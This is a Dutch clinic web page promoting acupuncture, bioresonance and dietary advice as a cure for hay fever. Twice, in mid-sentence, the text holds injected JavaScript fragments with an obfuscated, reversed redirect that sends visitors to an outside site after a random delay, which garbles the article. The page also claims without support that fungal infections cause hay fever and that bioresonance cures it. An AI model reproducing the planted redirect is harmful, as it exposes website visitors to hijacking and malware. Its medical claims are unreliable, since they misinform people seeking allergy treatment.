//Hooikoorts
Hooikoorts 2017-12-16T11:58:27+01:00

Hooikoorts

Hooikoorts kan echt verleden tijd zijn! Er is een effectieve behandeling beschikbaar met acupunctuur, bioresonantie en voedingsadviezen.

Je zou denken: “Wie geniet er niet van de lente en de zomer?”. Voor hooikoortspatiënten is jammer genoeg niets minder waar. Voor hen beginnen dan de niesbuien, het hoesten en de geïrriteerde ogen. Verder kunnen ze last hebben van benauwdheid, vermoeidheid en een gevoel van algehele malaise. Geen pretje dus.

Wat is hooikoorts? 
De klachten worden veroorzaakt door een overgevoelige reactie van het lichaam op stuifmeelkorrels (pollen) van de wind bestuivende bomen en planten zoals hazelaar, berk, kastanje, els, beuk, bijvoet, weegbree en grassen. Pollen zijn op zichzelf geen schadelijke sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toffen, maar bij hooikoorts beschouwt het lichaam ze wel als schadelijke indringers. Het afweersysteem is in feite van slag. Om de pollen te bestrijden wordt histamine door het lichaam aangemaakt. Het is de histamine die de ziekteverschijnselen veroorzaakt.

Hooikoortsklachten zijn divers en worden veroorzaakt doordat de slijmvliezen van bijvoorbeeld neus, ogen, mond, keel en longen overprikkeld raken. Waarom krijgt de ene persoon wel en de ander geen hooikoortsklachten? Bij diegenen die last van hooikoorts hebben, zijn de slijmvliezen in een verminderde conditie, vaak ten gevolge van een aanwezige schimmel, bijvoorbeeld een candida, fusarium of aspergillus.

Behandeling van hooikoorts bij Centrum Engelbrecht
Na een uitgebreid onderzoek naar de oorzaak van de hooikoorts met de BICOM bioresonantie, gaan we het lichaam en de slijmvliezen eerst aansterken met voedingsadviezen, bioresonantie en/of acupunctuur  Vervolgens bestrijden we de oorzaak, vaak een schimmel.

We kunnen ook preventief behandelen, maar kom dan wel buiten het hooikoortsseizoen. Tegen de tijd dat het lente wordt, hebben we het afweersysteem zodanig versterkt dat er (vrijwel) geen klachten meer zijn. In het hooikoortsseizoen kan er zo nodig nog een nabehandeling gegeven worden. Kom je in de periode waarin er daadwerkelijk klachten zijn, is de behandeling eerst gericht op het verlichten van de klachten. Bioresonantie en/of acupunctuur werkt dus ook bij acute hooikoorts. Hoeveel behandelingen nodig zijn, is afhankelijk van de aard en ernst van de klachten.

Klachten in de herfst en winter
Hooikoorts-achtige klachten in herfst en winter worden veroorzaakt door in de lucht aanwezige schimmels, waarop de slijmvliezen overgevoelig reageren. Ook deze klachten zijn zeer goed te verhelpen en kunnen dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tot het verleden gaan horen.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak. Goed om te weten: acupunctuurbehandelingen worden geheel of gedeeltelijk vergoed door de aanvullende verzekering, afhankelijk van uw polis.